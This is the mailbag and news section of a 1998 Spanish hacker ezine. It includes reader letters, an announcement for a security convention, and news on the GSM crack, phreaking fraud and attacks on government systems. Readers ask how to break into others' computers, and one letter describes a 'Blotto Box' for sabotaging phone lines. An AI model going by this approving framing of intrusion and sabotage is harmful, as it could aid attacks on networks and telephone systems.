  Les escribe un fiel aficionado a los hackers, pero apenas soy un bebe en 
  esto, por eso les escribo para pedirles que hechen una mano, y me 
  enseen a hacer esto... 

  Donde yo trabajo, hay una gran red de tipo T1, espero me puedan mandar 
  algo de informacion para hacer algo por aca.... 

  Tambien quisiera (si no es mucha molestia) que me ensearan desde lo 
  basico, como les digo soy un fiel aficionado y me fascina esto... 

  Como ustedes dicen: La informacion viaja y es libre.... (claro sin daar 
  a nadie). 

  Bueno, espero me contesten..... 

  atte: Un ser al que le gusta la superacion.... Slash. ;-) 

  <------>

  [ Thx :) pero como siempre nuestro consejo que es leas este ezine con
    mucha atencion y experimentes por tu cuenta. ]

<>
 
  Date:  Tue, 26 May 1998 22:18:36 GMT  
  From:  cubikice@xxxxxxxxxxxxxx      
  To:  jjf_team@usa.net  
  Subject:  Holas!! estoy vivo!! :-)  
 
  Hola!! 
  Queria responderos al mail que me enviasteis hace + o - una semana 
  en la que me deciais que ibais a publicar mi articulo y nada, que queria 
  daros las gracias, estoy preparando otro articulo, este de mi cosecha 
  aunque no se si os lo llegare a enviar, lo veo un tanto verde 
  El caso es que ahora mi placa base se la he tenido que dejar a mi novia :-) 
  total que estoy tirando de 486 y no puedo enchufar mis HD's de siempre 
  asi que os envio esto desde la web y con el LYNX, joder! 
  (y es que tampoco tengo CD-ROM), total que voy con un Linux descafeinado 
  y totalmente desconfigurado, menos mal que aun asi voy haciendo cosillas. 
  Bueno, no os pego mas la paliza, vais alguna vez por el IRC? me gustaria
  chtear un rato con alguno de vosotros algun dia. 
  Pues nada, eso es todo. 
  Un saludo!! cubikice@xxxxxxxxxxxxxx 

  <------>

  [ Okis, y estamos esperando ese arti :) siempre puede ser util para alguien
    y eso es lo que pretendemos en este ezine.
    Sobre lo de IRC, pues no, ya que no nos interesa mucho. Para estar
    en contacto con nosotros pues E-mail :) ]

<>
 
  Date:  Fri, 29 May 1998 20:51:46 GMT  
  From:  RAFAEL TREJO OLVERA <a75878@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  Zic  
 
  Hola quisiera que me ayudaran para poder ser un hacker. 
  Mi e-mail es Zic97@xxxxxxxxxxxxxx 
  De cualquier manera mandemen informacion sobre hackers o programas. 
  y les pido la direccion de un chat de hackers. 

  <------>

  [ Pues como ya hemos repetido tantas veces lee este ezine y nosotros no
    podemos enviar nada a nadie, okis ?

    #hacker
    #hack
    #hack_novatos
    #hackers
    #hack_the_world
    #hackgov ]

<>
 
  Date:  Wed, 27 May 1998 13:23:08 GMT  
  From:  Liang Xiao Zhu <casazhu@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  Un saludo  
 
  Hola conde vampiro, quiero que me ensees como entrar al ordenador de 
  otra persona. 
  No voy ha hacer nada ilegar solo soy cybernauta que quiere aprender algo 
  mas, gracias. 

  <------>

  [ Pues como siempre decimos no damos clases privadas y YA ESTA BIEN DE
    RECIBIR ESTE TIPO DE MAIL'S, OKIS ? Para eso tienes vuestro/nuestro
    ezine.  ]
<>

  Date:  Thu, 04 Jun 1998 04:32:33 GMT  
  From:  "Damian Broy" <dbroy@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  sugerencia.....  
   
  Hola muchachos, visite su page en la red y me percate de que en la 
  seccion de boxes hay un error en la Blotto Box. Esta solo sirve para 
  paralizar (o hacer mierda, anyway) toda una zona correspondiente 
  a un prefijo de caracterisitica telefonica, por medio del simpatico 
  envio de un gran flujo electrico a travez de la linea telefonica. 
  Espero haber sido util y los felicito por su pagina, si mi 
  interpretacion fue considerada erronea por uds pido disculpas. 
  suerte!!!!!! 
  Cook2. 

  Damian Broy 

  dbroy@xxxxxxxxxxxxxx 

  <------>  

  [Thx por la informacion. Prometemos cambiarlo lo antes posible. Y no te
  preocupes, tu interpretacin es correcta, cualquiera puede tener fallos
  :-) ]


<>

<>

                           ------------------------
                           - NOTICIAS UNDERGROUND -
                           ------------------------
  
                                                - J.J.F. / HACKERS TEAM -

<>

  I JORNADAS SOBRE SEGURIDAD EN LAS NUEVAS TECNOLOGIAS 

  14, 15 y 16 de Agosto 
  Madrid 
  _ _ _ _ _ _ _ _ _ 
  _.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-.._ 

  Durante mucho tiempo hemos notado la falta de unas jornadas de estas 
  caracteristicas, en las que se acercara a la gente de a pie los aspectos 
  man interesantes de la seguridad informatica y las telecomunicaciones. 

  Por primera vez en Espaa queremos organizar estas jornadas que den 
  pie a la realizacion de otras muchas y que esperamos tengan su continuidad 
  en proximos aos. 

  Para eso contamos con el respaldo oficial de la asociacion de estudiantes 
  ACD, a la que desde ya agradecemos su participacion y esperamos contar con 
  ellos en las futuras ediciones de SET CON 


  -[ QUE ES SET CON ]- 

  SET CON no es ni mas ni menos que una reunion de gente interesada en los 
  temas de seguridad en redes, seguridad informatica, programacion, 
  comunicaciones... 

  Para estas primeras jornadas disponemos de un ciclo de conferencias, 
  nuestra Secure Party, proyecciones de video, concursos, y el resto de 
  actividades que se nos vayan ocurriendo. Para ello, necesitamos de vuestra 
  colaboracion. 


  -[ CONFERENCIAS ]- 

  En un principio estan previstas tres conferencias o debates por dia, 
  exceptuando el domingo, en el que solo habra una conferencia. 

  En el momento de escribir este anuncio tenemos preparadas estas 
  conferencias: 

  * "Seguridad en Windows NT" 
  Conferencia en la que Chessy nos hablara del sistema 
  operativo Windows NT. 

  * Legislacion y delito informatico 
  * Virus 
  Posible participacion de Anyware y Panda. Nos gustaria 
  que la gente del 29A tambien participase. 
  * ... 

  Los que esteis interesados en participar en alguna conferencia o alguna 
  mesa redonda, escribid a <setcon@bigfoot.com>, indicando claramente sobre 
  que quereis hablar, que dias teneis disponible, y cual es vuestro nombre. 


  -[ CAMPEONATOS ]- 

  Para demostrar nuestros conocimientos o simplemente pasar un buen rato, 
  con la posibilidad de importantes premios. 

  { Trivial Security Edition } 

  Que decir sobre este entretenido juego de toda la vida. Pon a prueba 
  tus conocimientos en los mas diversos temas como criptografia, 
  sistemas operativos, protocolos, lenguajes de programacion, 
  telefonia o hardware. Quien sera el ganador??? 

  { Campeonato de Quake } 

  Nada que ver con la seguridad, pero si con pasar un buen rato. 
  Simplemente por eliminacion, a ver quien es el mas violento, el mas 
  listo, el mas... Quake 

  { Barricada } 

  El campeonato mas interesante de todos. Coge tu equipo y conectalo 
  a la red barricada. Lo unico que tienes que hacer es conseguir 
  que tu ordenador mantenga un servidor HTTP (puerto 80), servidor 
  de correo y servidor de FTP. Pero eso no es todo. A cada participante 
  se le suministrara un archivo, que tendra el mismo nombre para 
  todo el mundo y debera estar en el mismo directorio, aunque el 
  contenido no sera el mismo. No ganara el que mas tiempo este 
  operativo. Tampoco sera el que obtenga mas archivos ajenos. Sera 
  el que consiga ambas cosas a la vez. 

  { Gymkana } 

  El ultimo dia se realizara una gymkana en los alrededores del local 
  de las Jornadas. Se trata de demostrar que tambien tenemos algo de 
  fisico ;) 

  Habra pruebas tradicionales como el lanzamiento de discos duros 
  (si alguien los presta), o el de diskettes, hasta pruebas nuevas 
  como determinar la informacion de una tarjeta perforada... por 
  el tacto 


  -[ PREMIOS ]- 

  Parte de los premios pueden salir de donaciones. Asi que esperamos 
  vuestro apoyo en este aspecto. Personalmente considero como un gran 
  premio la obtencion de un speccy original ;) 


  -[ PROYECCIONES ]- 

  Durante las jornadas se proyectaran peliculas que hayan tenido o tengan 
  algo de importancia dentro del mundo de la seguridad informatica. Seran 
  peliculas como "Juegos de Guerra", "Fisgones" y hasta incluso "Hackers" 
  (Alguna habra que criticar, no? ;) ) 


  -[ MISC ]- 

  Quedan por resolver temas de alojamiento, transporte, horarios. Permaneced 
  atentos a la pagina de SET (http://www.geocities.com/SiliconValley/8726), 
  sonde apareceran los proximos anuncios y el enlace a la pagina de la 
  SET CON 98. 

  Para cualquier tipo de duda o colaboracion, escribid a 
  <setcon@bigfoot.com> 

  Have P/Hun 
  Falken 

<>

  CRACKEADO EL ALGORITMO DE LOS TELEFONOS DIGITALES (GSM).
 
  Investigadores crackean el codigo de los Telefonos Celulares
  por John Markoff

        San Francisco - En un logrado intento de crack un conocido metodo de
  encriptacion para prevenir la clonazion de los telefonos digitales moviles,
  un grupo de investigadores informaticos de la Universidad de California
  creen que tiene importantes evidencias que el sistema empleado por los
  telefonos es deliberadamente debil para permetir la vigilancia del gobierno.

        El metodo crackeado es conocido como GSM (Groupe Speciale Mobile). El
  sistema de encriptacion mas usado en el mundo para los telefonos celulares,
  el GSM es usado en unos 80 millones de aparatos alrededor del mundo y al
  menos unos 2 millones de telefonos en los Estados Unidos.
                                                                    
        Mas de los 58 millones de telefonos analogicos y digitales americanos
  estan basados en una variedad de otros metodos, pero 20 compaias americanas
  dedicacas a telefonia digital celular incluidas Pacific Bell, una division
  de SBC Communications, y Omnipoint corp. utilizan el estandar GSM.

        Dos investigadores de la Universidad Californiana Berkeley anunciaron
  el pasado Lunes que ellos havian logrado romper el metodo GSM usando un
  ordenador para determinar el numero secreto guardado en el Subscriber
  Identify Module (SIM), una especie de tarjeta de credito dentro del
  telefono.

        Si los criminales pudiesen crackear el metodo, ellos podrian clonar
  los telefonos protegidos mediante encriptacion GSM, para ello, tendrian que
  detectar un numero de un telefono y usarlo en otro telefono para fradulentar
  las llamadas. Por otro lado, los investigadores y los representantes de las
  compaias telefonicas celulares dijeron el Lunes que el uso de la clonacion 
  era remota en comparacion con la vulneravilidad de los telefonos analogicos
  celulares. Por una cosa en concreto, ya que dijeron, que para crackear el
  GSM se requiere al menos unas 10 horas de pruebas electronicas y la
  utilizacion de maquinas muy potentes.

        Lo que era mas intrigante todavia que el hecho de la seguridad, era
  que crackeando el codigo se descubrio que el llave digital usada en los GSM
  posiblemente fue manipulada durante el proceso de diseo para permitir a
  las agencias gubernamentales espiar las conversaciones celulares.

        Aunque la llave. conocida como A5, es un sistema de encriptacion de
  64 bit, generalmente un codigo dificil de crackear, los investigadores han
  determinado que los ultimos 10 digitos eran actualmente ceros. Esto
  significa que con potentes ordenadores, sistemas utilizados por las
  agencias de inteligencia gubernamentales, puede ser posible decodificar una
  conversacion telefonica rapidamente, explica Marc Briceno, director de la
  Smartcard Developers Association, una pequea organizacion de programadores.
  "Aparemente la llave se debilito intencionadamente", dice. "Y no puedo
  pensar en ninguna razon para hacer esto intencionadamente".
              
        Durante los ultimos aos, la industria informatica esta plagada de
  rumores sobre que las agencias gubernamentales han forzado o persuadido a
  los desarrolladores de cripto sistemas a implementar debilidades matematicas
  en los sistemas de seguridad o incluso puertas traseras. Algunos de estos
  rumores hablan sobre la N
1005
SA (National Security Agency) o la CIA (Central
  Intelligence Agency) que teniendo ellos mismos criptografos, diseando
  programas criptograficos para ellos mismos y despues lo liberan, para
  asegurarse que ellos pueden decodificar datos informaticos o conversaciones
  telefonicas.
                                            
        Algunos rumores han cogido importancia, en parte, sobre el autentico
  origen del sistema GSM. Expertos criptografos dicen que las primeras
  formulas matematicas, o los algoritmos, en el sistema criptografico GSM
  proviene originalmente de Alemania o Francia como parte de una creacion
  sobre un estandar en los aos 1986 y 1987.

        "Es imposible esto hacer esto, por lo que debe haber otras razones",
  alega Stewart Baker, un abogado de Washington que fue antiguamente abogado
  de la NSA. La NSA es una de las agencias mas acusadas de sospecha debido
  en mayor parte ya que su mision es interceptar llamanadas telefonicas.
  "La especulacion es facil, y nunca muere", dice.
                                                                
        Aunque, muchos expertos de la industria no pueden pensar en una buena
  razon de porque un algoritmo encriptador debe ser debilitado
  intencionadamente, otra razon que para permitir la vigilancia.

        "Esto a sido debilitado intencionadamente", dice Phil Karn, un
  ingeniero de la Qualcomm Inc., una compaia de telefonia celular que ha
  desarrollado un estandar alternativo al GSM. "Quien crees que esta
  interesado en hacer una cosa como esa?".
                                                                
        La debi llave fue descubierta por dos investigadores. Ian Goldberg y
  David Wagner, ambos miembros de la universidad de California en el grupo de
  Aplicaciones de Seguridad en Internet, Autentificacion y Criptografia en
  Berkeley. Ellos hicieron hincapie en que habian detectado facilmente el
  fallo de seguridad que permite clonar los telefonos celulares.
                             
        La industria de la telefonia celular es consciente del fallo en los
  GSM pero dice que realmente a reforzado su justificacion en la seguridad
  de los telefonos digitales.

        "Me quito el sombrero antes estos muchachos, han hecho un magnifico
  trabajo," dice George Schimtt, presidente de la Omnipoint. "Yo les daria
  credito, pero no estamos en peligro de fraude."

        Los investigadores y la Smartcard Developers Association dicen que el
  exito del ataque se debe a las nuevas evidencias de las practicas de la
  industria a esconder las tecnicas de seguridad del publico. La autentica
  seguridad, ellos alegan, requiere la publicacion de los algoritmos para
  que expertos independientes puedan verificar la fuerza del sistema.
                                                      
        "Esto demuestra otra vez un fallo en un proceso de diseo cerrado."
  dice Briceno. "Estas compaias se privan ellos mismoa de la seguridad, pero
  ahora las gallinas han llegado a casa para freirse".
    
  Link's Relacionados:

  Another GSM crack info page at
  http://www.isaac.cs.berkeley.edu/isaac/gsm-faq.html

  The GSM algorithm, COMP128 can be seen in a C program source code at the
  SmartCard Developers Association Web site at
  http://www.scard.org/gsm/a3a8.txt

  European Telecommunications Standard Institute main page at
  http://www.etsi.fr/

  Info about SIM at
  http://www.etsi.fr/brochures/stateart/vedder.htm

<>
  HACKERS DEL SERVICIO SECRETO INCAPACES DE CRACKEAR UNA INTRANET.

  PA 4/21/98 11:06 AM 

  By Giles Turnbull, PA News

        Hackers profesionales del servicio secreto fueron pillados en un
  intento de hackear el sistema de comunicaciones interno de seguridad del
  Gobierno, que fue puesto en marcha hoy mismo.

        Durante el desarrollo y planificacion de la Intranet, gente del GCHQ
  y otros organismos de seguridad similares tambien fueron pillados en un
  intento de hackear el sistema

        Pero ellos fallaron.

        Por otro lado, el ministro encargado del projecto admitio hoy que
  mirando los hackeos en los sistemas del Pentagono y de la Nasa en los
  EE.UU., el no puede decir que la nueva Intranet sea imposible de crackear.

        La Intranet Segura del Gobierno, The Goverment Secure Intranet (GIS),
  permitira a los ministros y gente del gobierno a comunicarse mediante
  e-mail y usar la herramienta cotidiana del Gobierno, conocida como Agenda.

        Una Intranet es un sistema de Internet cerrado que solo puede ser
  accedido por ciertas personas. Es un metodo muy popular en grandes compaias
  y organizaciones para sus comunicaciones internas.

        La primera fase del GIS, lanzada hoy, estara disponible para unas
  400 personas que tiene permiso para ver documentos clasificados.
                                                    
        La segunda fase, dentro de algunos meses, sera vista por unas 400,000
  personas y se incluiran documentos confidenciales.
                                           
        Nada clasificado como secreto sera puesto en la Intranet, dice el
  ministro en el cargo David Clark, Canciller del Ducado de Lancaster.
                                    
        Dr Clark dice que el comienzo del sistema a sido crucial para el
  futuro de un gobierno electronico.
                   
        "Esto a sido el comienzo del futuro sistema de funcionamiento del
  gobierno", alega.

        "Es una revolucion en el modo de hacer gobierno. Cuando llege al
  cargo hace un ao yo estaba sorprendido de que no havia nada sobre
  seguridad electronica en las comunicaciones de los diferentes
  departamentos.
             
        "Muy pronto en el desarrollo del sistema invitamos a dos grupos de
  Hackers del gobierno y les ofrecimos el reto de hackear el sistema. Incluso
  les contamos como funcionaba pero aun asi no consiguieron romper la
  seguridad".
                                                 
        "Estoy muy seguro de que sera muy, muy dificil tal vez, pero no
  imposible, romper la seguridad" aade Dr Clark.
                                              
        El GIS fue inagurada hoy en 6 departamentos del Gobierno, y la
  segunda fase empezara dentro de 6 semanas. Otros departamentos estan
  esperando para unirse en los proximos meses.

<>
  ATAQUE HACKER DURANTE EL CHAT DE YELTSIN.

  MOSCOW, May 13

        Los rusos dicen que han detenido 20 intentos de dejar desconectados
  los servidores de Moscu. 
                                                            
        Las autorirades rusas dicen de haber detenido unos 20 intentos por
  Hackers de desconectar el ordenador en el cual el presidente Boris Yeltsin
  estaba usando para su primera charla en Internet en MSNBC.
                                                                 
        La agencia de noticias entrevisto a un official de la Agencia Federal
  para las Comunicaciones e Informacion Gubermental, Federal Agency for
  Goverment Communication and Information (FAPSI) diciendo que los Hackers
  intentaron desconectar el servidor, refiriendose a la red gubernamental
  que provee el intercambio de mensajes entre Yeltsin e Internet.

        Chris Donohue, quien estuvo media hora en la sesion de chat en MSNBC,
  dijo que no a havido aparentemente ningun asalto en los servidores de la
  compaia, los cuales usan ingles para responder y preguntar. "Nuestro
  servidor funciono perfectamente, y ningun ataque fue notificado por nuestro
  equipo", dice.
                                
        Donohue dice que alrededor de unas 4000 personas se unieron al chat.
  Los representantes del FAPSI alegan que unos 22,000 usuarios de Internet
  visitaron el servidor de chat.
           
        La charla se fue desplazando hacia las nuevas leyes en las politicas
  de Moscu.                      

        Pero algunos navegantes del web aprendieron sobre las preguntaron
  qye le hacian a Yeltsin que su estado de salud es bueno en estos momentos,
  que nunca ha fumado un cigarro, y que su estilo de pelo se debe a la
  mujer de su vida y no por un pasado Irlandes y ademas dijo que no creia que
  Rusia este preparada para una mujer presidente.
                                                                             
        El FAPSI dijo que antiguamente sus lineas eran faciles de hackear
  mediante aparatos electronicos de alta tecnologia y sistema criptograficos.
                                                                      
        Varios Hackers adolescentes de diferentes paises, incluidos Rusia,
  han sido acusados de recientes asaltos a los sistemas informaticos del
  Pentagono en los EE.UU. y otras redes militares alrededor del globo.

<>
  AUSTRALIA: MILLONES EN PERDIDAS POR CULPA DE LOS PHREAKERS.

  14 May 98 By ANDREW PROBYN.
                                          
        Millones de dolares estan siendo robados de los usuarios de telefonos
  en Australia debido a phreakers que utilizan elaborados scaners telefonicos.
                           
        Viviendas, empresas y usuarios de telefonos mobiles estan siendo
   victimas de un gran y sistematico fraude telefonico. Las empresas Telstra
   y Optus han hecho avances en proteger sus redes de telecomunicaciones,
   pero los Hackers han incrementado sus entradas en la red para robar los
   codigos de los usuarios.

        El Herald Sun ha descubierto muchos casos en los cuales los Hackers
  eran acusados de estos actos, incluidos una vivienda que tiene una factura
  en llamadas por $10,000 que el niega haber hecho.
                                                                      
        Una investigacion del Herald Sun revela que: Llamadas eroticas en
  los Estados Unidos, la Guyana, la Republica Dominicana, Rusia y Chile son
  generalmente mamipuladas para aparecer en otras cuentas telefonicas.
                                              
        Los Hackers pueden manipular sus llamadas en Internet, locales e
  internacionales para que no sean detectadas.

        Las empresas con centralitas internas, PABX, son particularmente
  vulnerables y son frecuentementes usadas por los Hackers.
                                                                     
        Los telefonos mobiles aunque sus mecanismo de seguridad pueden ser
  clonados usando su tarjeta SIM, el chip ID que controla la factura.
                                                                            
        Wally Rothwell, representante de la industria de las
  telecomunicaciones, dice que el hacking se ha vuelto una costosa realidad.
           
        "El hacking le puede costar a los cosumidores unos millones de
  dolares," dice. "Algunas de estas llamadas son muy caras - llamadas
  eroticas, por ejemplo, puede costar solo $30 el ya conectar." Durante Enero
  y marzo de este ao, viviendas y pequeas empresas niegan haber hecho esas
  llamadas.

        Mr Rothwell dice que esto es "phreaking" - un faude en el cual el
  coste de las llamadas son dirigidas hacia otro usuario - y ha sido probado 
  en las centralitas. "Por otro lado, tenemos que comprobar si el hacking se
  puede hacer remotamente o desde fuera de la centralita de telefonos."
                                     
        Pero un experto phreaker conto al Herald Sun que los Hackers
   establecieron hace algunos aos ya como realizar llamadas ilegales en las
   centralitas desde lineas externas.

        "Cuando yo hacia esto usaba mi ordenador para programar la centralita
  para hacer lo que yo quisiera que hiciese," dice Mr Dedio.
                                                                         
        "Los phreakers expertos suelen usar lineas normales y ordenadores de
  sobremesa para generar ciertos sonidos para abrir la centralita" dice.
                                                      
        El dice que los Hackers tambien acceden a las lineas privadas
  manipulando los pitidos de las centralitas en las calles. Ellos pueden
  facilmente dirigir llamadas hacia los vecinos, dice, pero esto peligroso.
                               
        "Si puedes meterte en una centralita no hace falta que robes la linea
  telefonica de alquien," dice.
                                   
        La figura principal del Queensland University of Technology's school
  of data comunications, el profesor Bill Caelli, dice que ni siquiera las
  sofisticadas redes estan a salvo.
                                            
        Muchas compaias con sistemas PABX han sucumbido por los miles de
  millones en fraude telefonico en el Reino Unido, los Estados Unidos y
  Canada. Investigadores de la Universidad de Berkeley, California, el mes
  pasado probaron que los telefonos digitales ya no era seguros, clonando
  el chip SIM que controla la factura, dice.
                                                                         
        La Autoridad Australiana en la Comunicaciones dice que las grandes
  compaias tiene que tener extremo cuidado. "Cuanto mas grande es la
  compaia, mas grande es la factura y mas facil es para el Hackers
  esconderse," dice el representante Frank Nowlan. La pena maxima por
  phreaking es de cinco aos en prision bajo el Acta Federal de Crimenes.
                     
        El relaciones de Telstra Stephen Nason dice que Telstra cree que su
  red de seguridad es la mas segura del mundo contra los Hackers. "Como
  ninguna red es 100% segura, nosotros creemos que la red de Telstra es
  muy segura," dice.
                                                               
        El hacking no se esta expandiendo, dice, con probablemente unos 50
  casos por ao en Australia. El relaciones de Optus Kristin Meagher dice
  que Optus no tiene evidencia alguna de hacking en sus redes.

  (C) 1998 Herald and Weekly Times Limited.
  HERALD SUN 14/05/98 P7 

<>

<>

        Bueno, pues aqui acaba el numero cinco y ademas tambien nuestro
  primer volumen, que visto los mail's recibios y haciendo balances de los
  articulos aportados por los lectores, pues ha gustado mucho. Por supuesto
  esto es solo el principio, pero esto no se podra conseguir ni no nos
  ayudais aportando articulos, okis?

        Pues esto acaba por hoy y esperamos oir de vostros, vuestras
  felicitaciones, quejas, criticas, articulos o actos de hack, pues escribe a
  nuestro buzon y si tiene miedo pues ya sabes usa nuestra llave publica PGP.
  Escribe!!!!!!!

  jjf_team@usa.net


                         ADIOS Y HASTA EL SIGUIENTE NUMERO!!!
                               - J.J.F. / HACKERS TEAM -

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



